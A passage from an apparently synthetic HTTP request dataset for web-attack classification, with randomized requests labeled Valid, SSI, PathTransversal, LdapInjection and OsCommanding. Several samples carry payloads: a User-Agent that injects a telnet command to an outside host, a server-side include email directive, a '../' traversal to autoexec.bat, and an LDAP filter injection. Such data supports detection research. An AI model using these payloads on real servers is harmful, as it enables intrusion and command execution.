Authorization: NTLM dGVvd2Rld2VjYXM5cjF1eWRpdG5ydGViQmdzaWh5bnczc3ludVJF
Range: 01418-88080,370072-
Referer: /aaa2/siei/esa3/Ecddhreo.mdb
Trailer: Pragma
User-Agent: \"     \;     \/usr\/bin\/telnet    www.ngis.com   4529\;
UA-CPU: PowerPC
UA-Disp: 633,7308,8
UA-Pixels: 512x475
Via: HTTP/2.7 72.36.18.170
Transfer-Encoding: identity

null

End - Id: 42931
Start - Id: 10631
class: Valid
GET /d.IBNEQs0NUK3z.O2LHf/eat/e86.YN6uBdH60jO24B.php4? HTTP/1.0
Host: www.bNum.gov
Connection: close
Accept: */*
Accept-Charset: windows-1255;q=0.8, x-mac-arabic;q=0.3, iso-8859-1, windows-1255, iso-8859-1
Accept-Encoding: 
Accept-Language: acax-ohg1sco;q=0.3
Cache-Control: max-stale
Client-ip: 33.251.200.255
Cookie: tfoe7shnuu=inhtaccesoo;siaghntgeH5so=Oeewih;gheamtRmrnotoaR=papoTno
Cookie2: $Version="18"
Date: Sat, 23 Jul 05 10:16:26 CET
ETag: W/"qv@0yUVNFTi_8tHe"
Expect: 100-continue
From: 2a5l@oierufMLhr.com
If-Modified-Since: Mon, 10 Mar 08 17:09:47 CET
If-Unmodified-Since: Thu, 26 Nov 09 13:22:10 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 854
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest response="FcF6f5Fc9A37e66cB49eaBB5B16af622"
Authorization: Digest qop=auth
Range: 6-0447,7686-38299,7705-
Referer: /oinLtap.php
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: iwxr/5.7.0.6
UA-CPU: 68000
UA-Disp: 9474,018,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7494x790
Via: 3.4 www.bEhc.shtml
Transfer-Encoding: compress
Upgrade: telnx/9.9, iusnr/3.5
Warning: 674 248.72.204.237 "qtwehtZfh" 
X-Forwarded-For: 93.154.42.186
X-Serial-Number: 719045121636524930
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10631
Start - Id: 11405
class: Valid
GET /Ottl3he0ueze/6stszp/ricn.js?group byGMFvO2CycD=ppHjN6gvH&qooes=2&FbetweenAHV1=6%3De26%2Bp3meth&8s4dVHrg=4z%3Emhdy-h%5Bbn%7ErmEs%5C+s2&e9oYJc=6820&forlIe1thdtinlg=poCg6neemo&hi2f=od&o3ot=o9EtueaahrsIUeqo&sedsxejm=9Kk9goyryP HTTP/1.1
Host: www.anaY.it
Connection: iLuFc0
Accept: */*
Accept-Charset: iso-8859-7, ks_c_5601-1987;q=0.6, iso-10646-ucs-2;q=0.5, us-ascii;q=0.8
Accept-Encoding: identity;q=0.2, compress;q=0.9, gzip, identity, gzip
Accept-Language: astadK-tOsimwte;q=0.8, adinmhy-htHrhe, ohfitiag-bkwy5;q=0.8, rvoaoAle-tco6ser;q=0.6
Cache-Control: only-if-cached
Client-ip: 70.90.100.107
Cookie: hIi3=nntt;9hmeahtxjntLoh=nnd;zedlm=nofgra rr;nm6yetrudWd=fhbrlt3e;Kb.NIR=i2\i
Cookie2: $Version="63"
Date: Sun, 03 Sep 06 21:26:41 GMT
ETag: "RZ2m-ikEP5r@5ZO4xnn"
Expect: 100-continue
From: snso@neess.uk
If-Modified-Since: Mon, 18 May 09 07:10:27 GMT
If-Unmodified-Since: Sat, 31 Mar 07 12:08:23 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 339
MIME-Version: 4.6
Pragma: OteV6cdb='ptrz'
Proxy-Authorization: oaon 5kop=flre
Authorization: Digest algorithm=MD5-sess
Range: -422,-567468,98305-
Referer: /cCddrn.tiff
TE: trailers,chunked;q=0.3,gzip;q=0.0
Trailer: If-Range
User-Agent: Mozilla/2.0 (Windows; U; WinNT 2.1; hn-ed; rv:7.9.4) Gecko/59525527
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7012x529
Via: s6nas/1.5 www.onE7iut.png, gizxei/3.3 www.akcboe.jpg, o0c/7.4 154.87.222.234
Transfer-Encoding: compress
Upgrade: ahoel/3.1, wtEif/8.0
Warning: 602 88.249.39.89 "aeraeytusrieOtkxPo" 
X-Forwarded-For: 194.171.248.197
X-Serial-Number: 99503371855760774661
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11405
Start - Id: 31394
class: Valid
GET /enrrnelNzsEtnyswycr/2ync8HK_/ngSRTewXLPGBv/iBU2Rjqn/iCLAKnzTiCcEq2nk/hoehleamuGacjicurT/iieNnraeqx3/svA2/ecO2v4dfyg7nIW4Ov/5e2zqlsoneE/laS1yedh4tvoWAcrg/Ivn.png?u3nrela=itoshncog HTTP/1.1
Host: 131.230.208.102
Connection: close
Accept: audio/*;q=0.0
Accept-Charset: cp-932, iso-8859-5;q=0.2, koi8-r;q=0.5
Accept-Encoding: *
Accept-Language: baoioacw-gtdHSd;q=0.3, hore8r-o5eoj6d;q=0.4
Cache-Control: no-transform
Client-ip: 144.48.117.154
Cookie: eyo4ynortrfOrp=t
Cookie2: $Version="970"
Date: Sat, 28 Jun 08 18:51:37 CET
ETag: "C_n4EcdpE8pvRL8F.r"
Expect: ooso
From: Tzeuatea@eoges.de
If-Modified-Since: Tue, 17 Oct 06 17:43:52 UTC
If-Unmodified-Since: Fri, 09 Jan 04 17:57:55 GMT
If-Match: "os1C6.ntC5llh_JzVKMj"
If-None-Match: *
If-Range: *
Max-Forwards: 1368
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM cnRobWJNaGVoaXJQb25zczFGc25hM2VuYW9zc2RPbGVkb3NubHRpYVRkTm8=
Authorization: uuE9 bttfta=1tc9sr
Range: -6182,52054-760058,9-
Referer: http://ntme.de/tdtl/HFfnFns/BAuurld.php4
TE: trailers,gzip;q=0.1,deflate;q=0.4
Trailer: Upgrade
User-Agent: Mozilla/8.2 (Windows; U; Windows NT 3.0; ts-4M; rv:9.7.7) Gecko/52620614
UA-CPU: StrongARM
UA-Disp: 6015,3763,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2355x254
Via: FTP/0.6 www.orkMhn9.htm, 5.0 219.59.125.118, HTTP/0.2 195.181.0.8
Transfer-Encoding: gzip
Upgrade: ruexiD/5.5
Warning: 388 www.tfrat7d.jpeg:096 "hrsa7mrlleyurua" "Tue, 09 Mar 10 03:42:13 CET"
X-Forwarded-For: 160.213.53.125
X-Serial-Number: 178529
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31394
Start - Id: 23097
class: Valid
GET /IciBsJG-Ine/SnbeaRcgx66/jNI4tidxZ/yY.asmx?0xjOKbIn3IeY=e93a&glinkzs3=hn53KkNOg&un=tn%3B&e9senbpmier3M=tdfHhsso&UrsKG8m7=rer5ts%3Fm5m%3C&Lisfgneant9s=86149806&aeiurE=betweenr+Ntr HTTP/1.1
Host: 43.255.239.135:7900
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 44.61.195.169
Cookie: bwDlhQ9eddwd=roi6r9pachelmTtc;ueesgkuet43nKu=jiss;ocve=muooaOwan;0atttehmtaeeOl=)whpigbe
Cookie2: $Version="505"
Date: Sat, 09 Jul 05 22:06:21 CET
ETag: W/"t15mmUNACPbF9yvF1h8d"
Expect: J1eowUh=meeI7;lsma2nwe
From: Hocan@osthutarg1.biz
If-Modified-Since: Thu, 16 Jun 05 03:11:57 CET
If-Unmodified-Since: Tue, 07 Apr 09 03:21:33 UTC
If-Match: *
If-None-Match: "AcI1We7ltL0JBO32F6"
If-Range: Fri, 30 Sep 05 05:52:48 UTC
Max-Forwards: 387
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM dHV0YmdEN3B0ZEJlMGU3MWg5dDZPbGFocmUwc3Jnc3Rpb29hZA==
Authorization: NTLM QWR0dGRlY2Fhc2Rkb2hzbDFlcmU5YnB1N2FoaWlyYThv
Range: 189-,863-
Referer: http://nryyc.it/nSaora/wbmp/emsi/el1grE/aohsngnr.php4
TE: trailers,gzip;q=0.2,trailers
Trailer: Accept
User-Agent: iIidtfhoe0fariei
UA-CPU: Sparc
UA-Disp: 784,1462,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0764x660
Via: 6.7 www.Rztlin.tiff
Transfer-Encoding: compress
Upgrade: lN4/4.1, mlbe/9.6, leIed/9.3, per0s/1.6
Warning: 005 154.25.128.144 "pVsqstdnhwftt5otH" 
X-Forwarded-For: 73.70.52.35
X-Serial-Number: 18684889581671575
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23097
Start - Id: 14963
class: Valid
GET /tjp7mfhtmNlga93etsu/inaepae.php3?D.W1flv=iswuopoV&nsttsemwsSAaa=%5BleshahhciHdwf&r5=97075&HaV.WaaRzA=boot.ini&seEaduDdel9rk=s-h%29&sre3oreiZOfmrVt=eg35bglfy2iframe&0d@onQnetcatt=oVETVIk8H4&ceaAmliehsfidaN=6698494082 HTTP/1.0
Host: www.apihweehe.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: taRaq-uEah;q=0.0, thuyi-rdnw;q=0.4, v1-ftdctte;q=0.6
Cache-Control: max-stale=7
Client-ip: 104.201.186.158
Cookie: wuieeokeb=n-Or6NBrHq;w4cesd=ixy;ewyograo=dq_Xsa@ZP;cbTfvms=b2-u;e3hceaN=lhre2aetShee;EqeUeg=8ma9rsVwwe1r
Cookie2: $Version="0"
Date: Fri, 29 Feb 08 05:38:58 CET
ETag: "s8eHLDFcML.ZoPu7n"
Expect: 100-continue
From: eetydor@hlpn2.net
If-Modified-Since: Wed, 19 Oct 05 14:04:12 UTC
If-Unmodified-Since: Fri, 20 Jul 07 18:31:49 GMT
If-Match: *
If-None-Match: *
If-Range: "k@KoM9XsAmcOfn52"
Max-Forwards: 88
MIME-Version: 3.1
Pragma: tsiohoLh='ni00'
Proxy-Authorization: Basic cmV0czpzZG51ZXRs
Authorization: Digest realm
Range: -17567
Referer: /coreir/hlioh/wYgate9/0b9entT.php3
TE: trailers,gzip;q=0.1,gzip;q=0.6
Trailer: If-Unmodified-Since
User-Agent: thsehVe9fi9uswsAcefc
UA-CPU: PowerPC
UA-Disp: 2597,7674,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 8266x800
Via: 8.5 www.gmoers.jpeg, 1.6 70.49.240.8
Transfer-Encoding: compress
Upgrade: ug6bde/8.6, aewad/9.9, ltra/3.4
Warning: 436 73.117.227.57:6 "thodictf5aXh1rett" "Sun, 19 Apr 09 22:34:03 UTC"
X-Forwarded-For: 217.55.216.75
X-Serial-Number: 158686381572781
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14963
Start - Id: 11678
class: Valid
GET /g6y7GJRjU/Mg7fromE@8qvdu0q8X/JYPg@/ftnuodGxtCaoieeeJ/sKEEbcimFDHfXH/ioJ6tmpGGB3Y/5attL3dah.dll?nviPcvlbaxca=8412693&td7e5a=7lDun&KastREn8E7MHTj=7ktf%25aen&dm=+%5D%26sventrnhhei HTTP/1.1
Host: www.guaz7d.biz:31
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: y4lOcxm-aausees, yrit-ret9;q=0.9, h4-0BtsTccm, l-qsni;q=0.3
Cache-Control: no-transform
Client-ip: 37.188.138.86
Cookie: edyRet=cta1ae3e4tleon
Cookie2: $Version="5"
Date: Fri, 10 Nov 06 16:10:09 CET
ETag: ".Wlbew_KvVBg@FOx"
Expect: 100-continue
From: eehue@vTiniitte.gov
If-Modified-Since: Sun, 16 Nov 08 19:26:26 GMT
If-Unmodified-Since: Thu, 11 Nov 04 02:11:00 UTC
If-Match: *
If-None-Match: "NgAk6wqbF4iiNYf"
If-Range: "v.59m-aagye789YQXq-"
Max-Forwards: 999
MIME-Version: 2.8
Pragma: xee='sarm9oU'
Proxy-Authorization: Digest response="d23CB2FCd6e9A6000fbAcB3afe17C8A7"
Authorization: as1te4 snnht3=eSnnuoh
Range: 93-2855,61-3
Referer: /Tehbf.asmx
TE: trailers,gzip,trailers
Trailer: TE
User-Agent: swjUCyG http://www.wLer.be
UA-CPU: 68000
UA-Disp: 940,7536,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9473x212
Via: pasC/7.6 www.7yoae.html, 8.4 14.149.225.111, HTTP/0.2 www.vhdlws.png
Transfer-Encoding: hseoni
Upgrade: raif/5.6, ath/3.2, aqvie3/5.3
Warning: 457 70.235.212.144 "iexnltsprfrmWp" 
X-Forwarded-For: 105.168.38.104
X-Serial-Number: 2344723441
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11678
Start - Id: 4348
class: Valid
PUT /_Pqh/r3TCayQHehUSq9QOoe1/VdeleteRX/ugw/bodyW/etbn4@C/QY.htm? HTTP/1.0
Content-Length: 198
Content-Language: 8o,gr,uef6
Content-Encoding: identity
Content-Location: http://htYsevaw.gov/tCcshjr.aspx
Content-MD5: NHQ5bDVoYWV0N2VtZW9vRw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 20 Apr 08 11:32:04 GMT
Last-Modified: Mon, 26 Jul 04 06:49:14 UTC
Host: 24.24.223.235
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-10646-ucs-2;q=0.8
Accept-Encoding: 
Accept-Language: gtt-Fd;q=0.1, isemna-ctosa, ft-hPe, oauh4st-sr;q=0.1
Cache-Control: min-fresh=3929
Client-ip: 34.254.2.107
Cookie: nnnba=ylmAe;einrmbs=Rheo
Cookie2: $Version="29"
Date: Sun, 25 Jul 04 20:30:52 GMT
ETag: W/"oUkVXBPY-X1ABop"
Expect: 100-continue
From: hs8d@Mdane.fr
If-Modified-Since: Mon, 20 Sep 04 01:59:35 CET
If-Unmodified-Since: Fri, 28 Jul 06 12:33:25 UTC
If-Match: "eCAmS-QB7cFS8dFDM_"
If-None-Match: *
If-Range: "XsJv_fp-arFG7PIj4D"
Max-Forwards: 6499
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="eeii"
Authorization: Digest realm
Range: 972-943760,-311,94-125
Referer: http://www.2aErdie9.biz/Leermfci.pl
TE: chunked
Trailer: Range
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 8.5; aw-4t; rv:0.7.6) Gecko/88974637
UA-CPU: 68000
UA-Disp: 187,8771,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1837x602
Via: 9.1 www.resmow.jpg:42964, 2.1 60.71.173.24
Transfer-Encoding: compress
Upgrade: ihdt/5.8, ieavv/5.2
Warning: 055 244.62.200.40:2 "0plu" 
X-Forwarded-For: 139.143.108.151
X-Serial-Number: 83365893402992
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ttllea4pie=26990&Wchild3HQG=057&Emxrs=e8oosb3ss7selecttoy&MP.JREjS=ts&KP@-all1lXPPG=a&rn=fmd&tLmNt=aeeeeRI6nrqwls30e&eic5uKlibs=essamshl&5oehebtf=n4tx2rihe7e&ikmifbeasakmz=lD86DY-o&R58toNeattnD=4109

End - Id: 4348
Start - Id: 39357
class: SSI
GET /os_6/candFnbinjnullbodyfCdeleterkZL/td.tiff?uStsboctLsi=ydcweh0km8euieu&ginoctt=j_jP0&IGb4EEtQS@W=rI6tuxqudcptr&ie3eteh9lNs8eus=iGJD5&lelbdst=98651640&vhe5n=%3C%21--%23email+fromhost%3D%22www.nidiwf3.com%22+tohost%3D%22mailbox.msb.com%22+message%3D%22noaf+anpas2m+dieyei4l+rnalL%22+fromaddress%3D%22tVwtxp.com%22+toaddress%3D%22vi0.ls3.com%22+subject%3D%22e%22+sender%3D%22y2.com%22+replyto%3D%22iR7Ul.com%22+cc%3D%22ssi%22+inreplyto%3D%22haie7+leu+Lrar%22+id%3D%22a3mail%22+--%3E HTTP/1.1
Host: 77.215.5.199
Connection: close
Accept: text/html;q=0.2, text/plain;q=0.7, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 183.110.148.152
Cookie: 9nt=oo9eHatyr;ctsEaihlssrs=n lservicese;TdEKEFh.VWH=qlfd9-ae9uc;meeuotbsE2eem=e~sssock_streamer]xoupdateeziadminf;np=99380246;Mpyg=84671480
Cookie2: $Version="92"
Date: Fri, 14 May 04 10:19:50 GMT
ETag: W/"@4NOJSZ4ADlYgjcuK"
Expect: 1eaet=xvho;paeeore=ucea
From: ztifisTh@itMb.uk
If-Modified-Since: Wed, 25 Jul 07 24:32:20 UTC
If-Unmodified-Since: Fri, 05 Oct 07 18:05:44 GMT
If-Match: "ZBGnUn_p0b7b0RA8"
If-None-Match: "kyW_H@6G9d84fr9Ug_uT"
If-Range: Sat, 26 Jun 04 13:18:48 UTC
Max-Forwards: 45
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWFtb25kbXdsZm10ZWp0dG9Ub3NsZGlheHJhZWVoUDVyT3NtcDlwZWh0c2hIdHNl
Authorization: Basic bWVvM2E4bWE6eWtvYw==
Range: 1-35,9436-,-246816
Referer: http://www.oUdIXdhi.st/onbde0mh.wav
TE: trailers
Trailer: Referer
User-Agent: mra3eaMt (iJG2VX)
UA-CPU: 68000
UA-Disp: 3265,6315,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3889x5923
Via: 0.5 www.giaaAl.tiff, 2.8 www.faoe.css, 5.0 114.64.76.24
Transfer-Encoding: deflate
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 944 www.Jaealoez.html "Tccdyealtgcne" "Wed, 07 Dec 05 16:52:07 UTC"
X-Forwarded-For: 247.166.24.114
X-Serial-Number: 385637154
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 39357
Start - Id: 22310
class: Valid
GET /afeideer85sjsVees.aspx? HTTP/1.0
Host: 85.174.81.128
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 53.187.192.29
Cookie: QzreYhsaZ=100388;ee9Tpme6Ee1s=0&S;iCaiwHttl=l@Btmv4jN6;Et10Aaoels=10WlxyOD1d;npenAetlnonnHan=cMLXIhlaYw
Cookie2: $Version="57"
Date: Thu, 14 Jul 05 20:55:39 UTC
ETag: "Q6r-.ZHASE_U9EZ2b"
Expect: 100-continue
From: auRypu@Ia7irt.fr
If-Modified-Since: Mon, 28 May 07 23:58:51 CET
If-Unmodified-Since: Tue, 29 Sep 09 23:38:16 CET
If-Match: "1TySx0BfA0iqQuVpJi9"
If-None-Match: "fxF3o-gYwoeumSauP3"
If-Range: Wed, 28 Apr 04 15:28:47 GMT
Max-Forwards: 163
MIME-Version: 7.8
Pragma: 3rta='easeoor'
Proxy-Authorization: NTLM Z3A1dE8wdEh0YW9mb2RhZWE0czdlczZjODMyQ290cnRtYTF0NHc=
Authorization: NTLM OWRybjNlT3ppaDlUb25lcm9mOGxpbGN4ZWltb2hySW1jaDBpcGhzZWFnbG5sZQ==
Range: 394544-569495,98730-
Referer: /flNbah/eethr6p/7uxao/hoijtgDr.jpg
TE: chunked;q=0.0,gzip
Trailer: Trailer
User-Agent: st0e0P7d http://www.stxs.be
UA-CPU: Sparc
UA-Disp: 730,116,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6713x3375
Via: 7.5 www.faorntit.js, 7.9 153.76.135.117, 0.6 www.ercxt.html
Transfer-Encoding: identity
Upgrade: eOhtM/9.6, icm/5.3, zas/4.8
Warning: 770 75.153.53.86 "w8itmUrzdkl" "Thu, 24 Aug 06 03:48:31 GMT"
X-Forwarded-For: 148.120.96.11
X-Serial-Number: 8809830
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22310
Start - Id: 36184
class: PathTransversal
GET /oXZCgIUrQp.CtMKKqk/asQ6Ni6.@Ms_olmJ2/n1bHK_dcT3tJKc85LI/8hGPND/GlibI9/tlmMlsrdgrse/akTsqNent1tre5y/ar/iaHA4sssnt5aomsp/ZPWT83.0ii5.html?ag6sslhgnts=ftm&i5aciexi6rf=95565696&_9YexecE_=5hMiIe+oexecslt&deleteiqPisWhSf=..%2F..%2F..%2FWINNT%2Fautoexec.bat&inoetoeieanedl=bIBm5TZWOOuo HTTP/1.0
Host: www.2nDna.org
Connection: close
Accept: video/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 164.124.198.233
Cookie: edeyeaj=emfnlaasMaaesorsle;ecw=snptiss2dis0e;Zwboot.iniT1connect7HtfkP=ddmcpr;thmdp=t boa;no8ncxi6Ery=otFspsr@ynp~~+fa;OmHeav=t'\5sntasd
Cookie2: $Version="3"
Date: Tue, 24 Jun 08 10:40:15 CET
ETag: W/"nHaP4qc5I6B3sr.o"
Expect: 100-continue
From: hseoct@sy2ts.fr
If-Modified-Since: Mon, 14 Nov 05 23:19:34 GMT
If-Unmodified-Since: Tue, 04 Nov 08 10:49:22 CET
If-Match: "-M4HgsDwz.LEKgF"
If-None-Match: *
If-Range: Wed, 04 Apr 07 22:46:13 UTC
Max-Forwards: 3795
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM bHFrZW5keUxveWNlN2RiMXJvTGVudXNzM25ycXllbXJ1cGF0
Authorization: Digest cnonce="g1eaaho"
Referer: /vtoSstst/T9ytH/er3re2.pl
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 1.1; er-ew; rv:3.1.7) Gecko/64548638
UA-Disp: 094,1448,16
UA-OS: Win9x
UA-Pixels: 0116x5631
Via: FTP/9.3 216.161.6.142, HTTP/0.8 121.100.10.121
Transfer-Encoding: identity
Upgrade: aehn/9.5
X-Forwarded-For: 143.21.25.63
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36184
Start - Id: 29453
class: Valid
GET /tFot64rERiU/snvokqta6brloeimeEle/cirsfalre/i5eoXDjGI-D1tdW_6j/k@/swrte2x9eo/s6FGO@OW-rY/ee1xEmiKS/twhg7.cgi?c6cce=43&h6t=rS.&PuvH@MY=hzsftper&mumSmQnwQvbscriptX=8798&LnEotoih=htlog%28dtte+btlrp+exece&oMauosftpPeI=atciunihtpasspdhha&sirltsesax=LiEmimg&gFt=irgN&Nri0aMUiTgSwH=aeall0tb&neiinlj5t=80171324&aO3ahtdaaxota=dw&sie=iujqi&updateqeP2kLclg=t%40a&me=999 HTTP/1.0
Host: 74.22.151.239:2506
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: aqxdzpe-opAd;q=0.7, nei-wvrqite, rOetoH-tvcacmar, ps-Mirrcad
Cache-Control: max-stale=20
Client-ip: 38.179.162.14
Cookie: e9reeennhb=a9Iyrilat4onsap
Cookie2: $Version="9"
Date: Tue, 02 Mar 04 04:53:59 UTC
ETag: W/"w5pNSv_EbPM6fZqgoA"
Expect: 100-continue
From: moneAdh@fg3imxt.net
If-Modified-Since: Fri, 12 Oct 07 06:25:53 GMT
If-Unmodified-Since: Wed, 12 Sep 07 18:52:02 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 13 Jan 07 04:24:19 UTC
Max-Forwards: 4228
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Basic ZDFkcUw6ZW93NGNpcg==
Authorization: NTLM bnRzc3pzcmVlczVkZ253QW9vaHNobm5pNGtFNm5zMW50YWxu
Range: 705-82753,-558
Referer: /eobun5/a6Laue/c5el/aawot16j/asn9Lt9.php4
TE: chunked,deflate;q=0.7
Trailer: From
User-Agent: 3ABGh1o http://www.4dlakqae.it
UA-CPU: Sparc
UA-Disp: 206,807,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6889x7208
Via: 3.7 90.165.27.99
Transfer-Encoding: deflate
Upgrade: prltnc/9.6, vtkuzg/2.7, rvtwsa/5.2, e7yuc/3.8
Warning: 881 224.80.69.65:4958 "uy4Z" 
X-Forwarded-For: 25.153.217.247
X-Serial-Number: 7353709606596802316
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29453
Start - Id: 21304
class: Valid
GET /ttdaprayanitutmdnhoc/sHduLw@7n./i2H8Oaahg45trt/aXXtRvq-bFTOkPN/h0%u6I113WC5gWJ6.css?mrUbr=uis&o0cjdnnha=39738&yXrcpRscriptYHAhVU=sqn95zpmBF HTTP/1.0
Host: 149.40.40.102:80
Connection: keep-alive
Accept: application/rtf;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: identity, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 130.22.25.249
Cookie: lriqssgd=unionQdl/ng 
Cookie2: $Version="793"
Date: Sat, 26 Dec 09 03:09:30 GMT
ETag: "VQfLFIu_RZQEkke2ut"
Expect: Anrz
From: aMuwze@s4ddbiH.ch
If-Modified-Since: Tue, 06 May 08 05:11:15 CET
If-Unmodified-Since: Thu, 28 Apr 05 19:02:38 GMT
If-Match: "mVb2xtgQ-h_pIWZEsdi"
If-None-Match: *
If-Range: Sat, 19 Sep 09 08:29:21 UTC
Max-Forwards: 7778
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM T2VhbmFpbm05Y2hydW43d3BBZUpsZWNvYnIxN3JyTWZubmh5U2FlN0V0ZW94d3Q=
Authorization: NTLM b29vc3lQdHV0R1RmeW90ZHRyb3RvZWVmZTh5dFhlYnBSbg==
Range: 863-
Referer: /imsnmh/ahner.conf
TE: chunked;q=0.7,trailers,gzip;q=0.2
Trailer: Trailer
User-Agent: mIfpoirtCtsvAol
UA-CPU: PowerPC
UA-Disp: 698,349,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6998x4175
Via: FTP/5.4 www.iosD4rn.png, 0.4 72.66.199.228, 5.8 55.106.154.97
Transfer-Encoding: deflate
Upgrade: sgazls/3.2, aet/0.4
Warning: 220 20.74.85.15:047 "seLtmobona" 
X-Forwarded-For: 56.53.73.85
X-Serial-Number: 2418413
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21304
Start - Id: 38199
class: LdapInjection
GET /tetsnogysrewpae/YfaOnapsaxoe/cmbVd.bju_E1XGrOqb.q/nL-j/4NobtIurs/Wr0@0JtmpcbRv/bmABtj-AM_nEVovmzyYp/e76A5bdbb05nSs6i.jpg?nPJZhHonGB5f=iutik%24u%3Brst%26ild&Inblyiunevt7=%3DUeetc%3CEp%7En+&l8DxDctutVD4=fKwmKW.Q&khpej1selijaaas=11957252&lBnNaaistse=8495&JootsermE=73833057&syoaro=4%2Frnn9bgsoundE8tebody+%7Cpoetfe&opnxoRsmmce=371%29%28%26%28objectClass%3D3rn%29%28%7C%28sn++%3Daa%29%28cn%3DwEdm++J*%29%29&xH=505916 HTTP/1.0
Host: www.ta8eeoa.biz
Connection: close
Accept: text/plain, application/*, text/html
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: 8y-rspnteea, bpj-44, shgxtrua-e3nvStb
Cache-Control: min-fresh=24060
Client-ip: 9.211.101.123
Cookie: sCv@-9YjRM-=i6henpeelahNoarac;ih=303
Cookie2: $Version="7"
Date: Fri, 17 Feb 06 19:17:08 UTC
ETag: W/"K_UdcY8UF88HpDJdoTgY"
Expect: 100-continue
From: hnrpa@Dtsdlni.be
If-Modified-Since: Sun, 04 Apr 10 04:07:20 GMT
If-Unmodified-Since: Tue, 24 Jun 08 19:47:23 CET
If-Match: *
If-None-Match: "JMxoNj_owNG5dq-IhQmC"
If-Range: Tue, 31 May 05 23:12:01 GMT
Max-Forwards: 057
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: tnEjr B7bt5=zaeTe
Authorization: hmtuel fet4=hcsyo
Range: 83-68
Referer: http://6neIhces.cz/olnetl.php4
TE: deflate;q=0.0,trailers,deflate;q=0.4
Trailer: Max-Forwards
User-Agent: Mozilla/3.9 (Machintosh; U; PPC Mac OS X 1.4; c4-h8; rv:1.0.4) Gecko/89276644
UA-CPU: StrongARM
UA-Disp: 843,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8072x4973
Via: 5.9 248.205.182.57
Transfer-Encoding: deflate
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 65007245456337542415
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38199
Start - Id: 42851
class: OsCommanding
